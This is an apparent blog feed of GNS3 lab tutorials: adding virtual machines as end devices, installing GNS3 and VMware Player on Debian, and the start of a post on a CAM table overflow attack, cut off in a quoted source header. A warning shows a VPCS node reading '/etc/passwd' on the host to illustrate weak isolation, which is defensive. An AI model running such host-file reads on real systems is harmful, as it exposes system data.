put several of them to test end-user workstation behavior at several places
in your topology with little to no worry about the <span class="caps">CPU</span> or memory impact.</p>
</li>
<li>
<p>Dedicated appliances are designed to provide a specific service, like
networking (firewall, …), applicative (proxy, email filtering, …)
or administrative (monitoring, …) services.</p>
<p>Resource consumption vary greatly depending on the service and the software
used by the appliance.
However, professional appliances are usually designed to handle a large
number of simultaneous operations: some will support with no issue to see
the virtual machine resources settings reduced on test environments
(some may require a modification in their …</p></li></ul><p>Virtual machines can be added in <span class="caps">GNS3</span> topologies as end devices nodes and can
play various roles:</p>
<ul>
<li>
<p>Lightweight ones are very focused for instance to provide just enough to
test the network connectivity or provide a functional browser.</p>
<p>They start blazingly fast and are very light on resources, meaning you can
put several of them to test end-user workstation behavior at several places
in your topology with little to no worry about the <span class="caps">CPU</span> or memory impact.</p>
</li>
<li>
<p>Dedicated appliances are designed to provide a specific service, like
networking (firewall, …), applicative (proxy, email filtering, …)
or administrative (monitoring, …) services.</p>
<p>Resource consumption vary greatly depending on the service and the software
used by the appliance.
However, professional appliances are usually designed to handle a large
number of simultaneous operations: some will support with no issue to see
the virtual machine resources settings reduced on test environments
(some may require a modification in their settings, like reducing a cache
size, or may simply not support to run under lower resources).</p>
</li>
<li>
<p>Full-fledged virtual machines could be just anything, from a server system
to a end-user workstation, from an infrastructure system to a home computer, etc.</p>
</li>
</ul>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>When adding end device nodes to your <span class="caps">GNS3</span> topologies, don’t confuse
<a href="https://wiki.freecode.com.cn/doku.php?id=wiki:vpcs" rel="external" title="Virtual PC Simulator project homepage"><span class="caps">VPCS</span></a> nodes with actual virtual machines nodes.</p>
<p>While virtual machines offer a reasonable level of isolation between the
guest and the host systems, <span class="caps">VPCS</span> do not even attempt to provide such
isolation as executing a command on the host from a <span class="caps">VPCS</span> guest is as
simple as prefixing it with a <code>!</code>:</p>
<div class="codehilite"><pre><span class="go">PC1> !ls /etc/passwd</span>
<span class="go">/etc/passwd</span>
<span class="go">PC1></span>
</pre></div>
<p>If you want a <span class="caps">GNS3</span> topology to be isolated from the host system and the
physical network, don’t use <span class="caps">VPCS</span> nodes but use lightweight virtual machines instead.</p>
</div>
<h3 id="ready-made-systems"><a class="toclink" href="#ready-made-systems">Ready-made systems</a></h3>
<h4 id="gns3-appliances"><a class="toclink" href="#gns3-appliances"><span class="caps">GNS3</span> appliances</a></h4>
<p><span class="caps">GNS3</span> provides a centralized place to search for pre-configured <span class="caps">GNS3</span> nodes:
the <a href="https://community.gns3.com/marketplace/" rel="external" title="GNS3 marketplace"><span class="caps">GNS3</span> marketplace</a>.</p>
<p>It provides:</p>
<ul>
<li>
<p><em>Appliances</em>: these are mostly network-related and barebone free Unix systems.</p>
<p>It can be a good alternative to the manual configuration to install Cisco
images (as long as you have one of the exact firmware images expected by
the appliance template), but usually this is not really needed.</p>
<p>Regarding the free Unix systems, I usually prefer to install them myself
but I suppose it may still help sometimes.</p>
<p>The real jewel here is the <em>Firefox</em> appliance, a Qemu virtual machine
maintained by the <span class="caps">GNS3</span> team and relying on TinyCore Linux and providing
a very lightweight (256 <span class="caps">MB</span> of <span class="caps">RAM</span> for the complete virtual machine) yet
complete Firefox to simulate end-users in your topologies.
This is just a must-have.</p>
</li>
<li>
<p><em>Software</em>: this is… everything else.
It include software stacks, monitoring platforms, utilities, specialized platforms.</p>
<p>In notably includes a template for Kali Linux, but last time I checked
it was an old version and, as with other general purpose systems,
I find it more practical so simply install it myself than tinkering with
someone else’s work.</p>
</li>
<li>
<p><em>Learning material</em>: The marketplace is not only the place for topology
nodes templates, it also provide a large number of learning resources
provided by the community.</p>
<p>I did not try any of these, but their advantage compared to other available
resources is that the trainer usually provides ready-made <span class="caps">GNS3</span> topologies
to work with the course.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Appliance and software templates are just plain text files, not archive
files and they do not contain any virtual machine.
They only store the <span class="caps">GN3</span> node settings and either:</p>
<ul>
<li>A <span class="caps">URL</span> to fetch the free virtual machines (from <a href="https://sourceforge.net/projects/gns-3/files/Qemu%20Appliances/" rel="external" title="GNS3 repository: Qemu Appliances (SourceForge)">here</a> for
appliances maintained by the <span class="caps">GNS3</span> team).</li>
<li>A filename and a hash allowing to ask you to provide a firmware or
an installation disc image and check that it you provided the
right file.</li>
</ul>
</div>
<p>When installing a Qemu-based template, you may need to review its settings.
In particular</p>
<ul>
<li>
<p>If you are not using the <span class="caps">US</span> keyboard, you will have to specify your keyboard
mapping explicitely.</p>
<p>Go in the <em>Advanced settings</em> tab, section <em>Additional settings</em> and add
the additional Qemu parameters matching your keyboard (for instance <code>-k fr</code>
for a french keyboard).</p>
<p>Qemu usually stores available keyboard mapping files under the
<em>/usr/share/qemu/keymaps</em> directory.</p>
</li>
<li>
<p>If the template uses a single virtual <span class="caps">CPU</span> by default, add a second one.</p>
<p>Most virtual machines work better with two vCPU, and as long as you are
using a dedicated hardware for you virtual lab (which
<a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/" title="How to build a virtual lab">I advise you to do</a>) you should have enough resources to
support this.</p>
</li>
</ul>
<h4 id="standalone-virtual-machines"><a class="toclink" href="#standalone-virtual-machines">Standalone virtual machines</a></h4>
<p>While the <span class="caps">GNS3</span> images maintained directly by the <span class="caps">GNS3</span> project team are
high-quality, the quality of the content provided by third-party is very variable.</p>
<p>Third-party appliance and software templates often require outdated and
hard-to-find firmware or installation images.
While sometimes you can force the template to accept a file by removing
or modifying the hash stored in the template file, often it is just easier
and safer to simply manually create your own nodes.</p>
<p>A quick alternative to <span class="caps">GNS3</span> appliances is using standalone virtual machines.
To find ready-made virtual images, check my dedicated post:
<a href="/posts/2017/08/14/where-to-find-virtual-machines-and-iso-files/" title="Where to find virtual machines and ISO files?">Where to find virtual machines and <span class="caps">ISO</span> files?</a></p>
<p>To import a virtual machine, from <span class="caps">GNS3</span> menu bar go in <em>Edit</em> > <em>Preferences</em>.
The left pane of the <em>Preferences</em> window should propose you, among other
topics, the <em>Qemu VMs</em>, <em>VirtualBox VMs</em> and <em>VMware VMs</em> allowing you to
create new <span class="caps">GNS3</span> end device nodes by importing the selected virtual machine.</p>
<p><span class="lb-small"><a href="#new.png" id="new.png-thumb" title="Click to enlarge"><img alt="Screenshot: import a virtual machine" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/new.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>All things being equal, I personally prefer to use Qemu virtual
machines as they are more flexible and reliable thanks to better support
of linked based VMs (see below), offer more configuration options and the
access to the guest console is more user-friendly (no need to keep its
window permanently open).</p>
</div>
<div class="admonition note">
<p class="admonition-title"><span class="caps">GNS3</span> bug</p>
<p><span class="caps">GNS3</span> currently suffers from some bugs (<a href="https://github.com/GNS3/gns3-gui/issues/2239" rel="external" title="GNS3 issue #2239: Generating hashes of large images crashes the server and screws-up the GUI (GitHub)">#2239</a>, <a href="https://github.com/GNS3/gns3-gui/issues/2314" rel="external" title="GNS3 issue #2314: Generating snapshots containing large images crashes the server and screws-up the GUI (GitHub)">#2314</a>)
which may crash the <span class="caps">GNS3</span> server when adding a large virtual disk image
to it.</p>
<p>The workaround is to manually create a snapshot file like this</p>
<div class="codehilite"><pre>qemu-img create -f qcow2 -o backing_file=original-file.qcow2 snapshot-file.qcow2
</pre></div>
<p>And then provide the snapshot file to <span class="caps">GNS3</span> instead of the large, original <span class="caps">HDD</span> image file.</p>
</div>
<h5 id="linked-base-vms"><a class="toclink" href="#linked-base-vms">Linked base VMs</a></h5>
<p>Linked base VMs is a feature natively supported by Qemu, but its support by
<span class="caps">GNS3</span> for VMware and VirtualBox is still experimental.</p>
<h6 id="linked-based-vms-disabled"><a class="toclink" href="#linked-based-vms-disabled">Linked based VMs disabled</a></h6>
<p>When this feature is not used, adding a virtual machine to a topology makes
the <span class="caps">GN3</span> project to directly use this virtual machine <span class="caps">HDD</span> image.</p>
<p><span class="lb-small"><a href="#lbs-disabled.png" id="lbs-disabled.png-thumb" title="Click to enlarge"><img alt="Linked based VMs disabled" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/lbs-disabled.png"/></a></span></p>
<p>This raises several limitations:</p>
<ul>
<li>
<p>Any modification made to the virtual machine from within the topology
(meaning any disk access or file modification) affects the created virtual
machine itself.</p>
<p>Deleting and re-adding the node in your topology won’t rollback anything.</p>
</li>
<li>
<p>The virtual machine you added in your topology and the virtual machine in
the <em>End devices</em> menu are the same entity.</p>
<p>Any modification to the virtual machine in one topology affects every
other topologies using the same end device node.</p>
</li>
<li>
<p>Such end device nodes can be imported only once in a topology.</p>
<p>For instance you cannot simulate two workstations by adding the same
virtual machine twice.</p>
</li>
</ul>
<p>Several of these limitations come from the fact that several nodes cannot
access simultaneously the same virtual machine <span class="caps">HDD</span> image.</p>
<p>The common but quite inefficient workaround for this situation is to manually
create several copies of the same virtual machine, one for each node and for
each topology, and import every copies as individual end devices nodes in <span class="caps">GNS3</span>.</p>
<p>But a cleaner solution is by using linked base VMs..</p>
<h6 id="linked-based-vms-enabled"><a class="toclink" href="#linked-based-vms-enabled">Linked based VMs enabled</a></h6>
<p>When this feature is used, <span class="caps">GNS3</span> won’t directly access the created virtual
machines anymore, instead it will generate a snapshot and store it inside the
<span class="caps">GNS3</span> project directory.
Such snapshot acts as an intermediary layer over the <span class="caps">VM</span> virtual <span class="caps">HDD</span>: unmodified
data is read from the original virtual machine <span class="caps">HDD</span> image file, but all write
operations occur only on the snapshot file.</p>
<p><span class="lb-small"><a href="#lbs-enabled.png" id="lbs-enabled.png-thumb" title="Click to enlarge"><img alt="Linked based VMs enabled" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/lbs-enabled.png"/></a></span></p>
<p>If you add several end devices nodes referring to the same linked base <span class="caps">VM</span>,
whether in the same topology or in different ones, each one has its own
snapshot file, meaning that each one is independent from the others.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>When using linked base VMs, any modification of the base virtual machine,
the one initially created and serving as a base for all snapshots, would
irremediably invalidate all snapshots files and corrupt all associated end
device nodes in your topologies.</p>
<p>To avoid any wrong manipulation of the base virtual machine, <span class="caps">GNS3</span>
automatically proposes to copy it in its own directory tree.
Depending on the virtual machine size, the operation may take several
minutes but is recommended.</p>
<p>You are then free to use the original standalone virtual machine as you
like.
For instance you may want to use it as a master copy, to regularly generate
new updated versions of this virtual machine as new <span class="caps">GNS3</span> end devices nodes.</p>
</div>
<h3 id="create-your-own-virtual-machines"><a class="toclink" href="#create-your-own-virtual-machines">Create your own virtual machines</a></h3>
<h4 id="install-the-os-outside-of-gns3"><a class="toclink" href="#install-the-os-outside-of-gns3">Install the <span class="caps">OS</span> outside of <span class="caps">GNS3</span></a></h4>
<p>Usually, you can just begin by creating a standalone virtual machine the usual
way, then import it into <span class="caps">GNS3</span> as described <a href="#standalone-virtual-machines">above</a>.</p>
<p>However, if you are using Qemu and depending on your settings this can induce a
change in your virtual hardware properties that your guest system may not like
(either because of technical reasons like Windows’ <em>Fast Startup</em> feature or
due to license issues as this may be identified as a new computer).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>VMware Player virtual machines are less prone to such issues as the virtual
machine settings is directly handled by the Player, not by <span class="caps">GNS3</span>.</p>
</div>
<p>In case of issues, ensure that similar Qemu options are used both inside and
outside <span class="caps">GNS3</span>.
Right-clicking on a running Qemu <span class="caps">VM</span> node and using the <em>Command line</em> option
shows you the complete Qemu command used by <span class="caps">GNS3</span> to start this guest.
New options can be added in the <span class="caps">VM</span> node settings, under the <em>Advanced settings</em> tab.</p>
<p>Check in particular the <code>-cpu</code> option: ensuring that you keep the same <span class="caps">CPU</span> type
both inside and outside <span class="caps">GNS3</span> solves a lot of issues (<span class="caps">GNS3</span> does not use this
option by default).</p>
<h4 id="install-the-os-from-within-gns3"><a class="toclink" href="#install-the-os-from-within-gns3">Install the <span class="caps">OS</span> from within <span class="caps">GNS3</span></a></h4>
<p>For particularly tricky cases or if you prefer doing it this way, you can
install the guest operating system directly from within <span class="caps">GNS3</span>:</p>
<ol>
<li>
<p>Start by creating a new <span class="caps">GNS3</span> node device.
When asked to select the disk image file, select the <em>New Image</em> option
which should provide you access to the <em>Create</em> button allowing you to
create a new, empty disk image file.</p>
</li>
<li>
<p>Ensure that the imported virtual machine does <em>not</em> use linked base <span class="caps">VM</span>.
To check this, from <span class="caps">GNS3</span> toolbar, go in <em>Edit</em> > <em>Preferences</em>, select
your virtual machine, <em>Edit</em> it and, below <em>Advanced settings</em> tab
check that the <em>Use as a linked base <span class="caps">VM</span></em> is unchecked.</p>
<p><span class="lb-small"><a href="#no-linked-base-vm.png" id="no-linked-base-vm.png-thumb" title="Click to enlarge"><img alt="Screenshot: Uncheck 'Use as a linked base VM'" src="https://www.whitewinterwolf.com/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/no-linked-base-vm.png"/></a></span></p>
</li>
<li>
<p>Still in the virtual machine setting window, set any supplementary
settings like:</p>
<ul>
<li>The number of vCPUs (a minimum of 2 is usually recommended).</li>
<li>The <span class="caps">RAM</span> amount (2 <span class="caps">GB</span> is a common choice).</li>
<li>The console type (usually <span class="caps">VNC</span>)</li>
<li>
<p>Any supplementary required parameters.
When using <span class="caps">VNC</span> displays you usually need to also enable the <span class="caps">USB</span> tablet
device, set the keyboard layout and remove the default <code>-nographic</code>
options.</p>
<p>Your <em>Options</em> field should now contain something like:</p>
<div class="codehilite"><pre>-usbdevice tablet -k fr
</pre></div>
</li>
</ul>
</li>
<li>
<p>Mount the installation <span class="caps">CD</span>-<span class="caps">ROM</span> image into the guest system.</p>
</li>
<li>
<p>Create a new topology and add only this device.</p>
<p>If you need Internet connectivity during the installation process, add also
a <em>Cloud</em> and an <em>Ethernet switch</em> nodes as Qemu nodes cannot be
directly linked to Cloud nodes.</p>
</li>
<li>
<p>Proceed with the guest operating system installation as usual.</p>
</li>
<li>
<p>Once the installation has ended, enable back the <em>Use as a linked base <span class="caps">VM</span></em>
option, delete the temporary topology used for the <span class="caps">OS</span> installation and,
optionally, remove the installation <span class="caps">ISO</span> file from the virtual <span class="caps">CD</span>-<span class="caps">ROM</span> reader.</p>
</li>
</ol>How to install GNS3 and VMware Player on Linux (Debian)2017-08-12T00:00:00+02:002017-08-19T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-12:/posts/2017/08/12/how-to-install-gns3-and-vmware-player-on-linux-debian/<p>While installing <span class="caps">GNS3</span> and VMware should be easy, it in fact very easy to loose
a lot of time on silly issues.</p>
<ul>
<li>
<p>If you are interested only in installing VMware Player, feel free to directly
go corresponding part.</p>
</li>
<li>
<p>If you are interested in installing <span class="caps">GNS3</span>, I also recommend to install VMware
player as some appliances may require it.</p>
</li>
</ul>
<p><a href="https://www.youtube.com/watch?v=jRFskkpqndA" rel="external" title="Top secret GNS3 study tips (YouTube)">RouterGods</a> also shared a few tips on how to setup a more comfortable <span class="caps">GNS3</span>
lab.
Take a few minutes to check it once you’ve ended the installation!</p>
<h3><a class="toclink" href="#installing-gns3">Installing <span class="caps">GNS3</span></a></h3>
<p><span class="caps">GNS3</span> relies on Linux kernel features.
If you are not a Linux user, the recommended way to use <span class="caps">GNS3</span> is to use the
<a href="https://gns3.com/software/download-vm" rel="external" title="More information on the GNS3 official virtual machine"><span class="caps">GNS3</span> official virtual machine</a>.
This virtual machine may also be a good solution if you are a Linux user but
you just want to quickly test <span class="caps">GNS3</span> or do not want to modify your host environment.</p>
<p>For a regular …</p><p>While installing <span class="caps">GNS3</span> and VMware should be easy, it in fact very easy to loose
a lot of time on silly issues.</p>
<ul>
<li>
<p>If you are interested only in installing VMware Player, feel free to directly
go corresponding part.</p>
</li>
<li>
<p>If you are interested in installing <span class="caps">GNS3</span>, I also recommend to install VMware
player as some appliances may require it.</p>
</li>
</ul>
<p><a href="https://www.youtube.com/watch?v=jRFskkpqndA" rel="external" title="Top secret GNS3 study tips (YouTube)">RouterGods</a> also shared a few tips on how to setup a more comfortable <span class="caps">GNS3</span>
lab.
Take a few minutes to check it once you’ve ended the installation!</p>
<h3 id="installing-gns3"><a class="toclink" href="#installing-gns3">Installing <span class="caps">GNS3</span></a></h3>
<p><span class="caps">GNS3</span> relies on Linux kernel features.
If you are not a Linux user, the recommended way to use <span class="caps">GNS3</span> is to use the
<a href="https://gns3.com/software/download-vm" rel="external" title="More information on the GNS3 official virtual machine"><span class="caps">GNS3</span> official virtual machine</a>.
This virtual machine may also be a good solution if you are a Linux user but
you just want to quickly test <span class="caps">GNS3</span> or do not want to modify your host environment.</p>
<p>For a regular usage of <span class="caps">GNS3</span>, I recommend setting-up a dedicated lab machine.
You can see <a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/" title="How to build a virtual lab">this post</a> for more information on this topic.</p>
<p>This article is based on the official <a href="http://docs.gns3.com/1QXVIihk7dsOL7Xr7Bmz4zRzTsJ02wklfImGuHwTlaA4/" rel="external" title="GNS3 Installation on Linux"><span class="caps">GNS3</span> installation guide</a>,
focused on Debian systems and with a few additions where necessary.</p>
<h4 id="installation-process"><a class="toclink" href="#installation-process">Installation process</a></h4>
<p><span class="caps">GNS3</span> uses the same packages for Ubuntu and for Debian.
If you are using Debian, you must therefore edit the packages source to point
directly to <span class="caps">GNS3</span>’s Ubuntu repository.</p>
<p>Edit the file <em>/etc/apt/sources.list</em> and add the following lines:</p>
<div class="codehilite"><pre>deb http://ppa.launchpad.net/gns3/ppa/ubuntu xenial main
deb-src http://ppa.launchpad.net/gns3/ppa/ubuntu xenial main
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Here I’m assuming that you are using Debian 9 <em>Stretch</em> which matches
Ubuntu 16.04 <em>Xenial</em>.</p>
<p>To know which Ubuntu repository matches your Debian version, check the
<a href="http://docs.gns3.com/1QXVIihk7dsOL7Xr7Bmz4zRzTsJ02wklfImGuHwTlaA4/" rel="external" title="GNS3 Installation on Linux"><span class="caps">GNS3</span> official installation guide</a>.</p>
</div>
<p>Now you must import the key which allows your Debian host to check <span class="caps">GNS3</span>
packages authenticity, and then install these packages:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1
2
3</pre></div></td><td class="code"><div class="codehilite"><pre>sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys F88F6D313016330404F710FC9A2FD067A2E3EF7B
sudo aptitude update
sudo aptitude install gns3-gui vncviewer
</pre></div>
</td></tr></table></div>
<p>To enable Qemu virtual machine support, also install the following packages
(<span class="caps">GNS3</span> uses <span class="caps">VNC</span> Viewer to display a Qemu virtual host node terminal):</p>
<div class="codehilite"><pre>sudo aptitude install qemu vncviewer
</pre></div>
<p>If you need to recompile Dynamips from the sources (for instance to apply
the patches I mention in <a href="/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/" title="How to run a CAM table overflow attack in GNS3">this post</a>), you also need the following packages:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo aptitude install build-essential cmake libelf-dev libpcap0.8-dev
</pre></div>
</td></tr></table></div>
<p>A few supplementary notes:</p>
<ul>
<li>
<p>During Wireshark installation process(it comes as a <span class="caps">GNS3</span> dependency) there
is a message telling you that only members of the <em>wireshark</em> group will be
able to capture network paquets.
So don’t forget to add your <span class="caps">GNS3</span> users to this group as Wireshark is very
useful to debug the communication between to guest in the virtual network.</p>
<p>If you installed Qemu, you may also need to add these users to either the
<em>kvm</em> or the <em>libvirtd</em> group (depending on your distribution, check your
<em>/etc/groups</em> file) to be able to use hardware-assisted virtualization.</p>
</li>
<li>
<p><span class="caps">GNS3</span> is very sensitive to locales configuration.
If you encounter a <em>“could not find a default locale”</em> error message,
launch it while setting an explicit locale value (use <code>locale -a</code> to list
available locales on your system):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre><span class="nv">LC_ALL</span><span class="o">=</span>en_US.UTF8 gns3
</pre></div>
</td></tr></table></div>
</li>
<li>
<p>The <span class="caps">GNS3</span> <span class="caps">GUI</span> process can be launched as a background task (<code>gns3 &</code>), but
for some reason you may encounter freezes in particular when starting Qemu
virtual machines.
So prefer to leave it as a foreground task on its own terminal.</p>
</li>
</ul>
<h3 id="vmware-player-installation"><a class="toclink" href="#vmware-player-installation">VMware Player installation</a></h3>
<p>VMware Player is closed-source and, therefore, might seem a bit unclean
in an otherwise open-source lab platform.
But for now it is still a de-facto standard and I consider it a necessary
evil.
For more information, see my post on <a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/#vmware-player" title="How to build a virtual lab: VMwre Player host virtualization software">building a virtual lab</a>.</p>
<p>In case of doubts on some steps, refer to the <a href="http://docs.gns3.com/1u_D9XSSA5PVFrOrTWSw1Vn8Utvimd6ksv76F7731N84/" rel="external" title="Adding VMware VMs to GNS3 Topologies"><span class="caps">GNS3</span> official documentation</a>.</p>
<h4 id="installation-process_1"><a class="toclink" href="#installation-process_1">Installation process</a></h4>
<p>VMware does not rely on the Linux kernel virtualization functionalities (<span class="caps">KVM</span>),
instead it installs its own kernel modules.
But to be compatible with your kernel, he has to link them with your
current kernel headers.</p>
<p>First, you need to ensure that your system is correctly updated, notably to
avoid any incoherency between the currently running kernel and installed header files:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo aptitude safe-upgrade
</pre></div>
</td></tr></table></div>
<p>Then, install the dependencies required to build the VMware modules:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo aptitude install build-essential linux-headers-amd64
</pre></div>
</td></tr></table></div>
<p>Download and install the following VMware components (as for now none of these
links require registration):</p>
<ul>
<li><a href="https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0" rel="external" title="VMware Player download page">VMware Player</a></li>
<li><a href="https://www.vmware.com/support/developer/vix-api/" rel="external" title="VMware VIX API download page">VMware <span class="caps">VIX</span> <span class="caps">API</span> (<span class="caps">SDK</span>)</a> (required for <span class="caps">GNS3</span> - VMware interoperability).</li>
</ul>
<p>VMware assumes that you can run <span class="caps">GUI</span> applications as the <em>root</em> user.
If this is not the case in your environment, use the command below to compile
and install VMware modules:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre><span class="nv">DISPLAY</span><span class="o">=</span> sudo vmware-modconfig --install-all
</pre></div>
</td></tr></table></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Several websites mention a <code>--console</code> option, but it does not seem
supported anymore.</p>
</div>
<p>Restart your machine to ensure that all installed files are correctly loaded:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo shutdown -r now
</pre></div>
</td></tr></table></div>
<p><span class="caps">GNS3</span> is not able to create the virtual network adapters used by VMware virtual
machines on-the-fly, you must create them beforehand using the following
command (this commands need to be used only once, as part of the installation process):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo gns3vmnet -r <span class="m">10</span> 39
</pre></div>
</td></tr></table></div>
<p>This will create 30 virtual network adapters which should be enough for most
situations.
Feel free to decrease or increase the last parameter value depending on your needs.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>To remove those virtual interfaces, use the following command:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo gns3vmnet -C
</pre></div>
</td></tr></table></div>
</div>
<p>Now start <span class="caps">GNS3</span>, then from the menu bar go in <em>Edit</em> > <em>Preferences</em> > <em>VMware</em> and
set the following settings:</p>
<ul>
<li><em>Path to vmrun</em> should be configured automatically on a sane installation.</li>
<li><em>Host type</em>: set this to <em>VMware Player</em>.</li>
<li>Go in the <em>Network</em> tab, set the VMnet range to match <code>gns3vmnet</code> parameters
(<em>vmnet10</em> to <em>vmnet39</em> in the previous example).</li>
</ul>
<p><span class="lb-small"><a href="#vmware-settings.png" id="vmware-settings.png-thumb" title="Click to enlarge"><img alt="Screenshot: VMware settings" src="https://www.whitewinterwolf.com/posts/2017/08/12/how-to-install-gns3-and-vmware-player-on-linux-debian/vmware-settings.png"/></a></span></p>
<h4 id="unsing-vmware-images-in-gns3"><a class="toclink" href="#unsing-vmware-images-in-gns3">Unsing VMware images in <span class="caps">GNS3</span></a></h4>
<p>You may encounter a few pitfalls when using VMware images in <span class="caps">GNS3</span>.
I describe here the main ones with their solution.</p>
<h5 id="import-a-vmware-image-into-gns3"><a class="toclink" href="#import-a-vmware-image-into-gns3">Import a VMware image into <span class="caps">GNS3</span></a></h5>
<p>Two things must be kept in mind when importing VMware image into <span class="caps">GNS3</span>:</p>
<ul>
<li>
<p>To be detected by <span class="caps">GNS3</span>, VMware images must be stored in the VMware Player home
directory: <em>~/vmware</em>.</p>
</li>
<li>
<p>In the <span class="caps">GNS3</span> topology, open the host node configuration screen and,
under the <em>Network</em> tab, do not forget to check the
<em>Allow <span class="caps">GNS3</span> to use any configured VMware adapter</em> option.</p>
</li>
</ul>
<h5 id="installation-of-the-vmware-tools-in-the-guests"><a class="toclink" href="#installation-of-the-vmware-tools-in-the-guests">Installation of the VMware tools in the guests</a></h5>
<p>Some Linux distributions already provide a more up-to-date alternative to
VMware default tools.
Search your guest’s package repository for a package named
<em>open-vm-tools</em> or <em>open-vm-tools-desktop</em>.</p>
<p>Otherwise, you will have to install the default VMware tools.
They are not provided with the VMware Player installation archive, and VMware
assumes (again!) that you can open a <span class="caps">GUI</span> as <em>root</em>.</p>
<p>You can use my <em><a href="https://www.whitewinterwolf.com/posts/2017/08/12/how-to-install-gns3-and-vmware-player-on-linux-debian/vmware-gettools.sh">vmware-gettools.sh</a></em> script to
fetch and store all tools installers on your host system (run it as an
unprivileged user, it uses <code>sudo</code> internally to execute privileged commands
when required).
Then you will have access to the VMware Player menu options allowing you to
mount tools installers in the guest as <span class="caps">CD</span>-<span class="caps">ROM</span> images.</p>
<h4 id="common-issues"><a class="toclink" href="#common-issues">Common issues</a></h4>
<p>Here are the workarounds for common issues encountered when using VMware Player.
You will find information on more issues <a href="/posts/2017/09/26/common-issues-when-using-virtual-machines/" title="Common issues when using virtual machines">here</a>.</p>
<h5 id="keyboard-issues"><a class="toclink" href="#keyboard-issues">Keyboard issues</a></h5>
<p>On some environments, the <em>AltGr</em> keyboard key may be ignored by the guest.</p>
<p>To <a href="https://communities.vmware.com/thread/172478?start=0&tstart=0#1124959" rel="external" title="no altgr functionality - linux host, xp or vista guest">solve this</a>, edit the file <em>~/.vmware/preferences</em> and add the following lines:</p>
<div class="codehilite"><pre>xkeymap.keycode.108 = 0x138 # Alt_R
xkeymap.keycode.106 = 0x135 # KP_Divide
xkeymap.keycode.104 = 0x11c # KP_Enter
xkeymap.keycode.111 = 0x148 # Up
xkeymap.keycode.116 = 0x150 # Down
xkeymap.keycode.113 = 0x14b # Left
xkeymap.keycode.114 = 0x14d # Right
xkeymap.keycode.105 = 0x11d # Control_R
xkeymap.keycode.118 = 0x152 # Insert
xkeymap.keycode.119 = 0x153 # Delete
xkeymap.keycode.110 = 0x147 # Home
xkeymap.keycode.115 = 0x14f # End
xkeymap.keycode.112 = 0x149 # Prior
xkeymap.keycode.117 = 0x151 # Next
xkeymap.keycode.78 = 0x46 # Scroll_Lock
</pre></div>
<h5 id="mouse-issues"><a class="toclink" href="#mouse-issues">Mouse issues</a></h5>
<p>Sometimes you may have an offset between host’s and the guest’s mouse cursor position.</p>
<p>Using VMware Player in full-screen mode may allow to temporarily solve the issue.</p>
<p>For a more permanent fix, you need to define a fixed screen size in the virtual
machine configuration.</p>How to run a CAM table overflow attack in GNS32016-06-26T00:00:00+02:002017-08-19T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2016-06-26:/posts/2016/06/26/how-to-run-a-cam-table-overflow-attack-in-gns3/<h3>Knowing where difference with real gears lies</h3>
<p>For performance reasons, a lot of switch things are actually not part of the
<span class="caps">IOS</span> code but are implemented in hardware.
This includes the <span class="caps">ARL</span>, or <a href="http://computernetworkingsimplified.com/data-link-layer/basic-theory-operation-l2-switch/" rel="external">Address Resolution Logic</a>, which provides all the
methods to add, remove and lookup entries in the <span class="caps">MAC</span> address table.</p>
<p>Therefore, for the <span class="caps">NM</span>-<span class="caps">16ESW</span> module to work in <span class="caps">GNS3</span>, Dynamips had to reimplement
all these normally hardware provided services, or at least push this far enough
to allow an unmodified <span class="caps">IOS</span> to run on it correctly.</p>
<p>The sad thing is indeed that this is unfinished work, as stated in this
<a href="https://github.com/GNS3/dynamips/blob/master/common/dev_nm_16esw.c" rel="external">module’s source code</a> header:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre> 1
2
3
4
5
6
7
8
9
10
11</pre></div></td><td class="code"><div class="codehilite"><pre><span class="cm">/*</span>
<span class="cm"> * Cisco router simulation platform.</span>
<span class="cm"> * Copyright (c) 2006 Christophe Fillot (cf@utc.fr)</span>
